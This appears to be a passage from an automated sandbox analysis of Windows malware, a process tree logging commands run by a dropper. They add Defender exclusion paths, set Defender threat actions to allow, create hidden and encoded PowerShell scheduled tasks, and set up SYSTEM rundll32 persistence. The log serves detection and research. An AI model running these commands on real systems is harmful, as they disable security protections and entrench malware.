                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1992
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:688
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                            PID:2164
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:64
                                                                                                            4⤵
                                                                                                              PID:904
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:32
                                                                                                              4⤵
                                                                                                                PID:972
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:64
                                                                                                                4⤵
                                                                                                                  PID:620
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:1236
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                      PID:1916
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:1976
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:2976
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:1296
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:976
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:2096
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                4⤵
                                                                                                                                  PID:1536
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:1668
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:2904
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:1548
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        4⤵
                                                                                                                                          PID:2580
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:2616
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:2620
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "giffBDFki" /SC once /ST 21:28:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                            3⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:2468
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "giffBDFki"
                                                                                                                                            3⤵
                                                                                                                                              PID:2496
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "giffBDFki"
                                                                                                                                              3⤵
                                                                                                                                                PID:1776
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:2916
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1460
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1688
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1264
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "YoRBImjUnYbxcjeUQ" /SC once /ST 06:13:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exe\" 1b /WXfjdidgg 525403 /S" /V1 /F
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:1000
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "YoRBImjUnYbxcjeUQ"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2172
                                                                                                                                                      • C:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exe
                                                                                                                                                        C:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exe 1b /WXfjdidgg 525403 /S
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:1220
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2888
                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:676
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2228
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:2452
                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2052
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:2252
                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:2240
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2880
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:480
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:1880
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:532
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1964
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:1412
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1664
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1584
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:816
                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:1784
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "baOmDneVXoOuKLmJPZ"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2116
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2064
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:688
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1716
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:2320
                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:1692
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2924
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2908
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:1676
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:1416
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\lExdmLMBU\wHsUjx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kRLTqYWysAZjVOw" /V1 /F
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:1604
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "kRLTqYWysAZjVOw2" /F /xml "C:\Program Files (x86)\lExdmLMBU\TqEKbTe.xml" /RU "SYSTEM"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:764
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /END /TN "kRLTqYWysAZjVOw"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1060
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "kRLTqYWysAZjVOw"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1876
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "ykUuPKxmqaQUII" /F /xml "C:\Program Files (x86)\PqbaBdNutUHU2\xTItakc.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:868
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "ulpCfKOOGSKos2" /F /xml "C:\ProgramData\ypvfxRdiVpdIIEVB\UiIcUpp.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:112
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "FvvOAjPOJzCKoDLGH2" /F /xml "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\yjEkrSQ.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1664
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "WDMUNxCrfDqnCNrbnrT2" /F /xml "C:\Program Files (x86)\tcAZjUgKvOkyC\EUUntFm.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2248
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "qZvWQJXUOVWXUoxnV" /SC once /ST 18:25:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll\",#1 /cdidoEnc 525403" /V1 /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1892
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "qZvWQJXUOVWXUoxnV"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1500
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "YoRBImjUnYbxcjeUQ"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1532
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll",#1 /cdidoEnc 525403
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1420
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll",#1 /cdidoEnc 525403
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:2316
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "qZvWQJXUOVWXUoxnV"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2084
                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                              taskeng.exe {F8A69052-3223-4C05-B489-279C5E3EB72D} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1132
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:3056
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1236
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:876
                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1544
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:2952
                                                                                                                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2712
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:944
                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2736
